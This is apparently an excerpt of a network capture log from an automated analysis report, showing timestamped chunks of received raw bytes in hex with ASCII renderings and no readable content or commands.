                                                                                                                                                                                    2023-01-05 07:59:31 UTC18092INData Raw: 26 a8 f8 0c fd c8 76 09 4a e1 12 bc 34 b1 73 63 6d ef 7d 58 a8 ba f5 1d b0 48 b1 06 47 b8 d8 e0 c9 79 ce 21 50 ee 14 84 92 3b 32 88 7b fe 1c 69 52 f6 63 2b ce 6b ee 4d 83 c9 b7 74 0b d8 d8 10 e8 52 e7 d0 1a 1f 1b de bd 32 c0 2d 40 1f 4f d2 7a 7c fe 1f 10 a5 bb 74 79 5d 77 89 55 d0 f4 36 a4 92 c4 bb ad c4 9f ce 0e fa b0 a0 cf 92 41 89 90 dc 63 25 f6 74 36 7b e5 73 8c da d8 36 21 25 d5 80 d7 e4 38 b3 c9 19 73 55 6e 00 9b a9 34 bf 1a c8 da 27 2d c8 5b ef cd 4a db 35 a3 ef 96 34 69 e5 de e7 c3 d4 0a 96 5f 78 ad ec 1d 78 d5 cb 40 c8 65 1d 0a 8d 6e 97 21 fe 2b d2 8e 00 ee 70 5d 6c 3e 9c 3d 30 43 4d 45 48 41 9f bf e7 21 46 da c4 25 83 0f 5e e9 3a ca cf bf 64 0f ac 54 9e 87 a5 ac 6b 7b 69 77 50 33 ab db 6a fe af 08 de 33 ba 65 27 f6 2a 57 66 a7 b6 20 df 13 b0 c0
                                                                                                                                                                                    Data Ascii: &vJ4scm}XHGy!P;2{iRc+kMtR2-@Oz|ty]wU6Ac%t6{s6!%8sUn4'-[J54i_xx@en!+p]l>=0CMEHA!F%^:dTk{iwP3j3e'*Wf
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18108INData Raw: ad 1b 67 0c 47 ce a1 a5 84 cc 48 2d 1e 6c f6 c1 87 95 06 e4 0f 63 9d 10 3b 0d ae b8 cd c6 8f 36 2c 61 74 9e 00 89 c7 e4 34 0a 52 f0 d5 13 d2 c4 08 00 b6 44 07 79 04 8b 6a 63 e2 d5 46 99 67 c8 c1 22 98 81 0e 55 df b7 e7 c8 fd 39 47 c5 86 5b ed 1b 9c dc 26 c1 18 32 69 f4 bc 20 f6 02 90 21 37 8f 73 67 7e 9d a3 a8 e0 fc 2c 20 53 a5 10 ed 59 4a 60 ea 79 80 af 36 c4 d5 c6 54 3c 2e af 21 a8 e9 09 6d 33 86 9a b7 23 06 4b 16 a9 af 12 79 b6 be 9e 7e 0f 5b 3a 20 fe c1 89 d6 df ff 6a a2 44 7b 41 d0 92 9b c4 35 96 25 e2 27 e5 a9 a8 88 8b 00 f8 59 60 d9 f1 5f 73 ce 90 a4 4c 86 14 e3 58 c2 b2 1e d8 ae 70 33 fb ee f3 f8 35 d5 9a 9c 57 cc f9 10 3a ef 93 18 bd 85 1c 81 28 38 b2 b0 4a 0b 5b bc b4 e1 9f 1c e5 91 2e 1d ad 62 e8 d0 c3 88 36 b1 92 aa b3 c9 41 8e 6c 88 91 49 48
                                                                                                                                                                                    Data Ascii: gGH-lc;6,at4RDyjcFg"U9G[&2i !7sg~, SYJ`y6T<.!m3#Ky~[: jD{A5%'Y`_sLXp35W:(8J[.b6AlIH
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18124INData Raw: 91 d5 69 2d cd e9 13 fc c6 51 5b 0c 03 41 25 7f f6 a2 0f d0 43 ce 12 33 e6 e6 c0 d5 ac a0 dd d1 c7 49 dd 30 1b 88 a2 f1 1c d5 a5 a8 04 8c 1a 67 b2 a5 a2 65 8e 16 cf fb 46 c3 fc 14 6c e8 9c 9e 65 cf 91 22 8c 72 70 01 e7 c3 ee 2c 1d 3f 92 6d d3 12 f2 23 7f 47 c8 2e 99 96 eb d4 9f 20 91 0c 33 6b 38 5a 7b c2 8b 71 91 b7 4a c0 49 84 ec 5a 97 6e 32 2a 3e 5c e1 ec 86 d2 95 ac 28 65 77 ff cb 06 61 d2 5f 84 18 6d 43 ec c6 63 39 88 17 61 2c cc a1 0a 74 15 21 e9 c2 e2 1f 9e 4e 6f b4 98 e8 31 7a 20 e3 1a 86 ab 52 52 fa 86 2e 8c c1 55 e7 94 ce eb 8a 06 cf 06 a9 c9 86 9b 0a a0 0e e7 12 7e fb 17 28 15 64 11 9a 68 77 c7 b2 31 d1 48 bc 00 69 51 21 dc 5d 64 c0 9e 5c 17 45 83 16 82 ca 8c f5 1b a0 bf 69 28 45 41 48 da 35 8e e7 19 ab 6c c2 f5 d9 7c e1 19 19 6e fe ce e9 e6 aa
                                                                                                                                                                                    Data Ascii: i-Q[A%C3I0geFle"rp,?m#G. 3k8Z{qJIZn2*>\(ewa_mCc9a,t!No1z RR.U~(dhw1HiQ!]d\Ei(EAH5l|n
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18140INData Raw: 1d 83 f6 a5 78 36 30 b4 4d e5 1d fe 89 7e 8e c2 63 25 63 3a 9f ca c5 e6 be 74 27 99 d8 5e d4 a8 6b f1 3b 06 72 4a 20 20 61 be 9f c5 49 b3 ac 7f c4 73 f8 3a 87 a7 32 17 3a 3a 84 f1 21 36 38 d2 6c 79 f0 44 b2 e8 9c fd 07 d1 2d bb 09 50 f7 1f 6a d5 12 2e 9c ce 7d bc 6c bd 21 75 ce 3c 9f 8e af eb 34 02 f0 65 c6 e6 e5 2f 30 7c df 36 f6 ae 82 aa f2 45 bc bb d5 85 dc b2 d3 aa 13 1c 41 91 a5 0e 4d ca 15 bf 07 fa 43 05 1c 25 25 ab 6d 5b c0 ca b9 c5 16 57 f4 1b d8 fc d4 ea 4f 6a 89 ea 2c 88 c9 31 72 4f 4e 65 47 f0 82 82 f8 b8 55 3b c2 33 82 f1 58 6f 2b 61 04 e0 dd ff 4b 2b c5 d4 2b 52 da c9 4f 9a af 8b a5 00 65 30 9a d6 02 5d c5 b9 72 8e 48 16 f6 c4 d6 3d 47 47 36 2b 28 21 e6 e9 04 0c dd d5 18 a3 66 80 e1 22 d1 97 54 5a e7 32 4c 08 81 aa a4 c4 e9 24 c5 fb e3 0a 9a
                                                                                                                                                                                    Data Ascii: x60M~c%c:t'^k;rJ aIs:2::!68lyD-Pj.}l!u<4e/0|6EAMC%%m[WOj,1rONeGU;3Xo+aK++ROe0]rH=GG6+(!f"TZ2L$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18156INData Raw: 72 97 a6 0e 8c 9e e2 9e 52 ad d0 53 73 c8 48 4c ec 53 9b 88 72 ee ce d9 02 5a be e0 c3 bf db bd c1 fb 59 8f c4 5d d8 7e 2a f5 c2 f3 aa 28 c2 e4 09 e0 10 ff 4c 2c b8 0f 0c 41 78 34 60 1d 7a 08 39 59 a8 cf 16 61 50 32 31 03 4c 5d ed b4 d5 7b c3 b5 f6 ae 85 de 82 28 41 72 36 02 1e 3d 03 63 a9 2c c7 3c 38 87 20 43 3e 3c a4 3f a0 67 51 06 b3 a9 94 ba 4b d4 71 45 e7 17 d4 10 b9 1c e1 67 8d 18 a5 2f d4 5e 62 76 31 05 da e1 ae f9 01 ac 12 43 b5 20 c3 85 b9 49 e7 f0 b5 1a d0 0f 8c 5d 0d 14 0d c7 ba a3 44 60 c6 b5 d0 79 b9 8b 73 4f 67 c3 45 28 14 8c 87 b7 02 26 d4 5f cb ed 3d e3 13 34 66 89 70 d7 07 c1 45 c0 49 07 0c c8 b9 1e f4 63 a2 cc 7a eb b7 f4 1c 82 19 5d 61 7b df 3a 80 0c fb 96 67 76 2e 04 9d 00 4c 8d 29 00 15 96 61 0b 51 5a 42 06 26 40 45 4d 1e 38 64 df 83
                                                                                                                                                                                    Data Ascii: rRSsHLSrZY]~*(L,Ax4`z9YaP21L]{(Ar6=c,<8 C><?gQKqEg/^bv1C I]D`ysOgE(&_=4fpEIcz]a{:gv.L)aQZB&@EM8d
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18172INData Raw: 52 dd 44 53 36 bc ac 64 63 aa 94 56 c8 bd 9a 17 de 86 ae 03 d6 16 99 17 cf ab 76 3e eb b5 e3 51 72 74 0e 72 37 56 00 f9 28 c9 71 dd 19 32 80 c0 be bf 2c 09 78 93 fb 00 bc 33 db e8 88 c0 02 4f 8a 82 db bd a2 01 6b 5f b3 f5 f5 16 37 da 3e cf f0 91 65 5b 50 5e 58 3f 6c 95 3a ce db cd 78 8f 02 5f a6 d6 c9 e8 c3 e0 b7 dc 6a 78 2f cb 6f af cf fa 9d 69 c4 7c b0 d2 93 16 e1 57 11 81 1a c2 d0 16 ea 4e 28 a8 2f f4 f2 c9 93 93 50 98 ad 37 04 e7 bf 4d 44 8a a2 10 f1 ba 38 4f 60 49 c4 a8 3f 1b 15 9c fb 17 b9 b0 bd 67 5d 13 72 6f 0c 67 dc 5b 22 35 50 ae 20 c2 3c 52 73 56 1d 9d 06 1c 62 32 f4 26 a0 30 0e 3c f6 c4 75 ac c4 2a 55 47 5d 22 d0 38 ce 62 8c 45 d3 16 d7 8f da 3a 83 86 58 8c 78 e1 d7 19 cc ac c5 2e b5 d8 db 35 18 37 b3 35 76 a7 94 0b 7f 06 10 1d be 30 3a 2d bd
                                                                                                                                                                                    Data Ascii: RDS6dcVv>Qrtr7V(q2,x3Ok_7>e[P^X?l:x_jx/oi|WN(/P7MD8O`I?g]rog["5P <RsVb2&0<u*UG]"8bE:Xx.575v0:-
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18188INData Raw: 38 4f ad f5 88 22 08 f8 57 b0 f7 6c 3c 1d 90 2c 2b 41 c3 8f aa ea a9 de 2e d1 e0 29 fb b4 e4 8b 3f 63 50 22 a6 1d 59 46 57 31 7c 5e ae e9 93 bd 12 c9 10 fd dd 15 3f 57 1a aa 2f 51 ab 6f d4 5b ee 1c f2 36 1b e0 c4 cc 88 fb e7 3b ba ff 15 61 de 83 fb 8b b3 d6 c4 d8 46 b4 54 90 da f2 65 71 05 1c 62 d4 f3 70 a6 39 fa 6d 23 35 40 5e 0f 4c 9e 59 5f 58 03 36 56 b9 71 13 d0 e0 85 09 74 ea 91 05 2e c1 d1 a1 f0 82 dd 73 9d d0 c9 cb 56 18 e3 87 0a 0c 4d b9 57 80 ad 4e 88 92 35 6b e7 88 c7 9e 7f df 00 e9 28 6c bd 3a 83 94 0d 76 3b b2 1e 12 5f 1e ba c3 bd ba 18 f1 b2 93 9b 0e 01 f2 a0 01 75 b0 6d a3 a9 88 a8 f1 d9 41 73 7a 1b 03 a3 c1 46 63 a2 80 fe 9b da b8 6d 99 4a 7a ba 5c 34 8f 36 a3 53 94 a9 76 69 cd b4 95 36 ee 4a 8f 40 ce 59 7f cf 11 0f 6b 16 88 f7 5e d3 ed 03
                                                                                                                                                                                    Data Ascii: 8O"Wl<,+A.)?cP"YFW1|^?W/Qo[6;aFTeqbp9m#5@^LY_X6Vqt.sVMWN5k(l:v;_umAszFcmJz\46Svi6J@Yk^
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18204INData Raw: 92 45 36 ad d3 5c 77 fd b7 79 51 70 7f a8 bd 3b d1 bd a9 9a 98 55 d6 da 00 b5 d9 77 c8 58 4c 0e 3b c5 90 53 8f 46 24 b0 80 14 c9 15 00 de 8e 0e e1 dd 2d a0 d5 0a c2 f5 a4 ab 93 72 5b 94 f4 e3 bc 69 60 17 80 3c 29 04 c5 5a 63 4f 09 6d de 38 bd 74 2a f2 20 2f e0 d9 81 f7 ce 05 3a 4a e7 38 f9 e8 37 fb c1 b2 0a 4e 55 78 e3 dd 88 51 55 8a 47 d3 86 39 9c 5b 03 e1 65 3f 29 06 43 de 6c 5e e7 b1 2d c3 27 ac 6d d6 90 39 67 92 59 76 98 60 0f b1 1e ae 26 fc d8 83 60 9f dc 32 ae 32 36 d5 88 01 1d 06 02 2c 50 95 ca a4 f6 44 80 04 86 f6 c2 5b 8a 3f a9 fd de ce 28 34 2e 78 50 39 e2 68 39 ae 4b 71 17 ac d6 8f 41 5a af e8 a0 fd 76 aa 1c e7 ab 2e 39 8f 58 bb a0 12 2f 1d ae 01 88 08 bc 1b d4 ec 59 d2 de 74 4b 8d 54 98 5d 2d 42 22 56 8b ac d2 63 09 d3 b0 d3 f3 0d 04 e2 f7 07
                                                                                                                                                                                    Data Ascii: E6\wyQp;UwXL;SF$-r[i`<)ZcOm8t* /:J87NUxQUG9[e?)Cl^-'m9gYv`&`226,PD[?(4.xP9h9KqAZv.9X/YtKT]-B"Vc
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18220INData Raw: dc f0 3b 39 3c 51 0a 29 5a b4 5c 18 ce 54 60 1e eb dc 62 cc 22 32 df ec 47 30 1b 53 03 c2 f9 c3 44 bd b9 b6 61 f3 45 bf 1d 7d 64 c5 69 17 0d 83 c1 1f 80 b8 81 db 34 65 01 5e 53 8c ab d3 75 c3 90 08 0c e3 28 21 c8 5d 9f c9 bf cc ec 39 37 12 3a db e2 b8 91 0c 81 ff f6 90 7c 0f 45 04 95 29 84 14 5a 3d 49 cb b2 74 17 ea 27 ff 96 11 a1 55 91 bb bf e3 6a 97 72 b3 9e ba d2 e1 67 61 cf 61 15 c9 cc de fc 1b 13 ec 80 ed 9a 7f 2b 5a e0 43 a5 45 a4 6c af ca 8a 7f b9 ec bb 32 e4 ab 87 32 9f f2 44 1d 55 04 e1 70 7f 28 c3 5f 5e f4 f6 a4 4f 6a 33 22 d3 e1 38 19 ea b5 7f bd 75 93 4e b9 aa d4 8e 23 75 db 5e e3 71 d4 8e f2 e4 d8 79 94 f3 74 ff 59 f1 91 8d fe 55 14 69 39 db 45 11 bd a4 4b 4b 1b 19 7a 5e d4 8f b2 eb 7c ab c6 51 4b 1e 81 45 c2 44 5c db 43 68 3f ee 10 7a e7 24
                                                                                                                                                                                    Data Ascii: ;9<Q)Z\T`b"2G0SDaE}di4e^Su(!]97:|E)Z=It'Ujrgaa+ZCEl22DUp(_^Oj3"8uN#u^qytYUi9EKKz^|QKED\Ch?z$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18236INData Raw: ee 78 9b 65 d5 57 f3 87 7a 7f c1 7d 6d e8 01 53 f1 16 fd a5 e5 cd 10 bf 2f 51 6a 47 ac 3b 59 38 f8 d2 f4 c8 b4 7a ea f2 02 e9 06 dd 35 67 fe ff 4d 69 f6 cc 3d 5d 73 0d 88 1f cf d9 1a a0 c0 35 1a 04 4a c1 bf fa 9b 76 4d 22 f2 31 37 5a be 5b 0f dd 4b 10 cc fb a4 40 3e 21 15 26 6a d0 57 cf e5 67 76 b3 ab 53 0e c5 3e da 91 70 75 e9 85 93 b0 95 11 76 e5 99 23 72 d3 89 bb c6 e6 7f 65 0c 67 90 1e 9d c9 d5 ad a2 3c 5a af 46 36 09 9f 53 23 a0 30 91 69 41 27 dc 5a b0 3b 54 dc 3d ff 01 f5 9b d1 48 a3 ea 25 72 6b a3 a8 d7 ee a5 d1 a0 1e 19 30 24 59 58 5b 3c fc ca ab 1a c0 5d 7a 96 8a 03 57 ed 29 02 18 61 bc d7 30 84 6f 02 0f 10 c8 f9 e9 82 6b ea a0 69 ce 59 c7 70 bb da 15 42 ac 54 92 99 d4 0d 6f f3 67 1f 2a 7f 04 20 f4 a0 10 e3 02 9a a0 64 60 8e 6c dc 24 1c d7 16 09
                                                                                                                                                                                    Data Ascii: xeWz}mS/QjG;Y8z5gMi=]s5JvM"17Z[K@>!&jWgvS>puv#reg<ZF6S#0iA'Z;T=H%rk0$YX[<]zW)a0okiYpBTog* d`l$
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18252INData Raw: 97 a4 c3 4e 4e e8 c7 8b 28 a9 6f 0b 9b 71 91 5a c1 47 21 0e 76 ee 41 af 81 e7 4b 91 8e 0f 44 d8 2e 7d b6 9d 29 5d b4 d9 3c 7e d3 a0 1f f3 ac ed 14 85 ff e3 7c 53 42 a6 ad 93 5a b9 37 71 6d 01 0b dd 0d fc 3d 2e 11 45 fa 57 d8 71 1f 4c 2d f7 b3 8a e0 34 c3 34 cb 6e 66 75 1d 2a ee b8 58 27 6d bb d7 44 62 a3 53 18 99 d9 05 0b d3 94 02 67 c6 60 ac c6 fa ee cd 83 f5 95 e9 4c 6e 81 85 f9 60 6f c5 eb c7 d5 a2 c9 23 7e 8f 4c 3f 72 91 fe e6 67 cd 24 8e 1e d1 13 65 9f 91 bf 0d c0 ff 96 5c 14 22 67 64 26 eb db 0c 01 a3 5d f9 c9 a0 9a 43 50 a8 aa 96 c2 86 f6 16 1a 33 cb 30 2e f9 38 76 69 6e 2d 3d bf a8 a7 28 17 89 03 6a 43 62 12 b8 e5 10 4d 0f c6 2e 08 0f ea c7 be c3 f3 4c 38 d4 77 eb 09 f5 ec ae 29 8b d4 ee 20 25 91 2b 79 ed 62 e0 b0 ff 43 1e 54 1b 5d ba 73 5c 31 1c
                                                                                                                                                                                    Data Ascii: NN(oqZG!vAKD.})]<~|SBZ7qm=.EWqL-44nfu*X'mDbSg`Ln`o#~L?rg$e\"gd&]CP30.8vin-=(jCbM.L8w) %+ybCT]s\1
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18268INData Raw: 43 47 cd e1 a5 2d 8c d6 80 c6 d7 3e 8c 94 d9 48 3a ed c6 d2 aa e3 cd 44 64 27 9e 6b e6 90 e3 58 b8 63 8c 57 76 a1 51 bc 9c 37 7c 34 bd 67 f5 0d 0e 53 00 eb ef 21 a0 a2 1e 22 f4 7d 7a 50 92 a4 61 80 2f 4d 2f da a8 65 8c 7f 21 ab 54 62 ac a4 da 17 2f 6b f7 28 d6 72 ef e4 3f 18 f6 dd 8f 17 6a 11 5f f5 db 06 d6 4c 9a 1e 2a 0c 74 bd 64 b1 71 fb ab 9a 98 a3 f3 dd 7c 79 d2 60 85 0d 94 d9 bf 68 33 d1 2b 39 4b cf 82 81 8a 87 19 dc e9 b0 91 cb d5 f2 6f 37 2d 31 e5 d1 98 62 6b b1 37 b8 a0 01 5b 7e 45 aa 18 55 c7 bd 43 56 33 c6 e6 9b e2 bd 4e b3 fa b2 a1 ce 34 74 e1 86 0d 79 8a 23 5d f4 c7 2e da 5d 39 3a b9 c4 48 06 00 cb 1b b8 32 9b 05 fc e0 8f 13 73 aa 93 dc d2 fe f7 c1 4a c2 16 56 97 a0 11 f1 6c 18 eb 90 bd 59 45 f4 49 82 9a 3e b1 f7 c8 e1 d0 30 ba 35 17 36 42 73
                                                                                                                                                                                    Data Ascii: CG->H:Dd'kXcWvQ7|4gS!"}zPa/M/e!Tb/k(r?j_L*tdq|y`h3+9Ko7-1bk7[~EUCV3N4ty#].]9:H2sJVlYEI>056Bs
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18284INData Raw: 0b c4 04 3e 4f da 92 e0 bd eb 63 3a e2 e3 c5 b3 c5 b4 cd 6d 25 ec 8a d7 5d 98 88 f9 45 e6 4f 4a b6 7a 90 04 ae 3a e8 de bb f9 97 d2 58 58 96 53 3c ca 35 11 a8 f0 6b 7b d9 19 1a 59 b4 72 e8 08 80 bc 7c 31 4b 3f 73 11 1f 1a 2a e7 1c 7f 17 d9 96 03 db c8 62 b9 e0 c1 d2 b6 40 61 fd 4d 20 c2 13 51 38 8a 98 29 70 91 1d e0 67 bf bb 5b c3 2e 99 4f e3 d7 db f6 60 5c 04 64 91 04 a4 9a ab cb 73 b9 57 9a e8 cd 67 be f3 62 48 50 d3 ae 45 73 ed 6a da 9f 6e e7 d0 0d e8 c3 ba 8f 82 fd 30 34 53 99 d3 ee b3 92 d6 e1 fc c8 42 7a 50 61 47 b9 d0 e7 c5 04 40 fc b3 52 1c ff c8 bd c9 e2 91 69 28 15 e2 53 c7 94 36 53 ba 73 29 8b b7 3a 8d fd e3 e6 80 1f d5 66 9b 8d 3e 65 2c 7b 80 d1 6a 8d 07 35 05 99 4d 29 b2 41 ba 1b f4 5c d7 62 c2 bd 61 db c9 67 43 aa e0 e0 83 2e 18 71 97 a6 58
                                                                                                                                                                                    Data Ascii: >Oc:m%]EOJz:XXS<5k{Yr|1K?s*b@aM Q8)pg[.O`\dsWgbHPEsjn04SBzPaG@Ri(S6Ss):f>e,{j5M)A\bagC.qX
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18300INData Raw: e2 98 f2 bc ef 51 c1 f3 3b 02 10 d2 58 03 cb 3d 0c 49 4d 6b f9 be 6e 54 b3 ae 5a fb 00 9b c7 2e 3d 73 58 6e d6 cf 9a 71 65 1b c4 db 31 d9 28 6b 99 8b 02 ce 98 dd d6 dd e4 07 d1 5f 0b c7 22 df a6 25 44 a6 98 60 e4 51 da 39 80 92 32 06 fb a8 6b d4 a1 17 84 ef 0d f0 c1 28 97 56 53 da 54 58 ad c6 95 f9 7a e2 7b df 6a c8 83 1f 1d 05 a1 2c b6 5a 99 4a 3c c4 c4 5f 28 41 c3 ea db 00 5f 1c 86 10 9c fd da 6a 84 c2 9f dc 5b 95 d4 2d 98 dc 5c ac 9f a3 09 54 82 c3 de ee 25 cf f1 da 6a ee ff c1 81 55 ac 04 9c a5 b6 e0 92 b5 1c 78 be b4 f9 13 b2 96 2e 04 7b 52 ae 23 ee 1e de 28 08 1e 2b 41 a1 0f 50 09 11 c2 cf 87 58 1d 93 8c a7 c9 d8 3f 2a 08 bc 3b 85 d5 a6 e7 ae f7 05 ec dc dd 49 02 28 46 df ee b9 75 81 84 27 31 21 8d da b9 7e 48 0a f2 78 1e 4c fb e2 15 25 22 6c 9c 49
                                                                                                                                                                                    Data Ascii: Q;X=IMknTZ.=sXnqe1(k_"%D`Q92k(VSTXz{j,ZJ<_(A_j[-\T%jUx.{R#(+APX?*;I(Fu'1!~HxL%"lI
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18316INData Raw: 7a db 82 a0 c5 2c 6a 7c 2b 41 a9 ed d9 18 2f 01 c4 b7 84 60 39 22 b9 0a 9a 81 0b 2e ca fb cf 17 3c 0e 91 d2 1f 8c 5c 4d 8c 5f d7 58 b6 4a 0d 0e 71 41 34 76 e1 8a ed ab ed 62 69 d3 19 17 8b 3f d3 1a f4 ce a7 30 01 77 3a 60 71 fe 7a 7b d1 45 a2 20 c4 b1 a8 67 c3 c0 18 c5 50 de 17 b7 f1 9d f9 bd a3 68 41 3f 0b ed 48 9d 35 b3 a7 1c a3 fb d1 76 29 e9 de 26 17 2d 31 2f 85 ad 46 f8 af 22 92 99 f5 16 14 b6 a5 b5 9d 94 df e8 78 ab e8 0e 2f 68 7e 82 ad 39 1f 79 41 fb cc 74 93 14 d0 5b ff b1 56 e2 1b 97 d1 d8 e8 1e 50 0a 8f 3f 25 1f 3f b0 8f 79 55 37 b7 c2 dd fe e2 99 02 ea 67 a2 64 f9 df a6 04 36 dc bc 11 df 17 c1 d3 da 53 e8 66 0e ac a9 31 c8 dd e1 6c ef 80 64 ba 70 6f e6 85 5f 33 46 8c b1 03 50 14 88 73 19 81 ef a1 75 93 5b bb b6 61 50 22 6c 24 3a 08 19 df cf e2
                                                                                                                                                                                    Data Ascii: z,j|+A/`9".<\M_XJqA4vbi?0w:`qz{E gPhA?H5v)&-1/F"x/h~9yAt[VP?%?yU7gd6Sf1ldpo_3FPsu[aP"l$:
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18332INData Raw: ce f0 a9 97 af df 3b 28 be 7b b3 fe 32 7f c9 59 ef 05 93 79 b3 b0 91 c7 44 ee 52 fd 7e 60 86 2d 03 93 e8 6c 11 b1 2f 52 ff 59 5b 7d 99 09 7f ea 62 f8 31 31 d4 c6 dd 25 8e 81 d3 d2 99 31 5c 2c 05 f8 28 de 25 be 24 c0 bf 9f 08 f7 34 af 2d 33 75 77 9d 70 ea 0b c4 41 c7 f2 a9 ba 6d 04 ae 3a 05 37 ef b4 10 a1 ed c8 bb 3a 0d a7 02 c4 99 8f b8 9c b8 9f 39 df 06 05 52 4f 86 93 5e 4e 77 ff 82 ed 0e 1a a2 f8 b3 f3 39 04 60 c2 f4 42 a7 6a 01 eb 4c 6f aa 7a de ea e4 17 c9 ac d4 9f f0 9a df 4a 53 51 2b 38 08 81 72 d1 3d 04 3d df a3 80 f6 5f a6 99 21 d8 a1 28 87 3c da 8d 96 6a 18 56 06 ca e5 2b cd e6 7e 02 ac df 00 50 23 56 ec 58 a0 ff 10 06 c5 f4 c2 e5 e1 64 1f b5 ba 7b f3 c4 db 18 d0 e6 ec 08 98 26 52 e1 01 6e 50 56 4d 7c b5 0f f9 0c f8 6b de 62 af 1e 40 06 11 cf 39
                                                                                                                                                                                    Data Ascii: ;({2YyDR~`-l/RY[}b11%1\,(%$4-3uwpAm:7:9RO^Nw9`BjLozJSQ+8r==_!(<jV+~P#VXd{&RnPVM|kb@9
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18348INData Raw: f5 cb 1d c4 f4 89 af 40 93 3f 0b 2b 98 84 e2 f0 63 ec f3 cb 52 8f 32 de cc e4 49 06 a7 5a 7a b7 9d 5f 10 98 56 7a 26 77 80 11 5a 5e b0 5a 84 fe f0 cf 23 4b 8e 87 01 d6 9e 74 0d 8c 69 b0 79 cc 0a 5e a8 8f 4c 2d 00 3b 29 15 88 5d aa 49 7a b8 fd 34 40 b1 bc 42 ac b8 7d c8 1b 21 2c da e4 52 7b f2 36 07 2d 98 cd 58 1d d8 de 53 a4 f9 a3 70 cf 1a 7c 8c 11 32 94 87 52 f5 16 bf d1 9a bd 06 54 ae dd 14 5c 90 0e 05 57 58 e0 d9 49 88 5e d2 2c 04 67 15 ea 41 cc 1a 12 dc ec dd 41 2e a3 ff dd 6f b2 0f 3a 65 a6 2c 00 d1 0d 9d 65 2d 0b 81 fa e6 ac 1f 35 8e f5 83 3a a1 85 12 03 5e 4f 3f 66 a2 6a cd c7 a3 93 0f a6 15 97 13 52 7d dd df e7 e9 45 e5 43 9d af ac fa 03 ce 3f 9a 09 11 c8 22 6c 00 bd 50 e2 f1 34 dc e0 af 8c 65 71 26 7d 67 e4 76 75 56 2f ad 54 4d 72 f5 d5 43 48 ab
                                                                                                                                                                                    Data Ascii: @?+cR2IZz_Vz&wZ^Z#Ktiy^L-;)]Iz4@B}!,R{6-XSp|2RT\WXI^,gAA.o:e,e-5:^O?fjR}EC?"lP4eq&}gvuV/TMrCH
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18364INData Raw: fe 46 8a 15 f5 03 da f2 3e 28 f4 56 02 75 91 88 ac b6 3b 85 72 3a 32 51 5b 55 40 b7 ce 27 de 4f c1 b4 9b 0b 8d cd 2b cd 79 e9 0f 21 38 af 34 ad 80 f3 9e 09 38 67 60 8d 78 be 6c 2d fa b3 f7 62 1f db 2e 71 82 62 da c5 2c d5 09 f2 c5 d1 61 6d 96 12 cc 10 a1 0f 36 79 16 90 99 3a 4e 43 f6 2a 4a 26 d7 c2 d5 f5 f7 d0 e9 d3 72 b8 64 9b 1a 53 b3 70 fd c7 af d5 a7 65 fa a9 a3 95 d7 df 58 b5 e0 e8 0b 36 72 38 9e 03 5e 9d 34 b6 c0 1a f7 2a 3d 8a 60 c7 25 ed 35 ad 38 c3 09 ee ce 08 27 54 5f dc 84 33 cf 5c f8 6b 12 65 42 bf ac 8c 4f 41 e4 e1 d4 f5 d3 16 b8 0d ba 93 f4 19 5f ed 90 ca 4d 4d f2 82 db ac 3c 8d 13 85 cb 64 76 9e 1a 5e 4c 68 ab 88 ce da 36 90 b1 7e d0 4d c2 70 3f 95 38 92 d5 41 fd b5 fa 3e eb 97 7f 54 08 54 5f a4 d6 42 eb bd 68 2d af 6c 2e 53 55 8c 98 00 bb
                                                                                                                                                                                    Data Ascii: F>(Vu;r:2Q[U@'O+y!848g`xl-b.qb,am6y:NC*J&rdSpeX6r8^4*=`%58'T_3\keBOA_MM<dv^Lh6~Mp?8A>TT_Bh-l.SU
                                                                                                                                                                                    2023-01-05 07:59:31 UTC18380INData Raw: a3 69 ed 18 ca 92 2a 3d 56 0c 37 73 3c e4 a3 3a 1e 8f dc 4c 01 c7 3b f2 be 44 b0 37 89 5d 20 c3 d6 2c a3 6b 44 99 3f c5 cb 76 2c 87 69 2d b7 db d6 56 f1 40 18 f8 e5 bf 9c d1 b6 4e 99 3a 7f 69 2c 36 4c b9 39 c0 c6 ae 1e 51 32 94 c7 bc ea 78 57 1b a5 c0 5e 81 78 3e 35 a0 15 8a f9 eb bb 20 2c 31 01 90 92 03 57 69 17 a3 c6 76 f9 41 82 aa d3 19 6d e8 ee b3 26 09 ec 9d b6 f7 71 80 2d db ec 20 d2 f6 46 3a d7 44 70 83 e4 66 c3 af fd a5 be 08 5f f9 18 54 82 37 36 a0 0a b3 34 4e b8 61 d1 c7 a9 e1 be 8c 9e dc a9 51 98 de f4 0c 74 2d b8 ad 13 ec ee 78 5f e1 5a 68 f3 b3 b6 ac cd 74 dd 0e 67 58 0e 67 b3 8d 40 5e 8b 00 34 7d cb b2 62 91 ed 2b f9 44 a0 82 cc 8c 88 1c a1 ba d1 d3 91 7e 25 48 82 57 9e 7e 7f ab 2e dd 3a 04 b4 c8 e6 bf b4 15 c2 73 c6 18 08 3d 8b 9f f8 98 73
                                                                                                                                                                                    Data Ascii: i*=V7s<:L;D7] ,kD?v,i-V@N:i,6L9Q2xW^x>5 ,1WivAm&q- F:Dpf_T764NaQt-x_ZhtgXg@^4}b+D~%HW~.:s=s
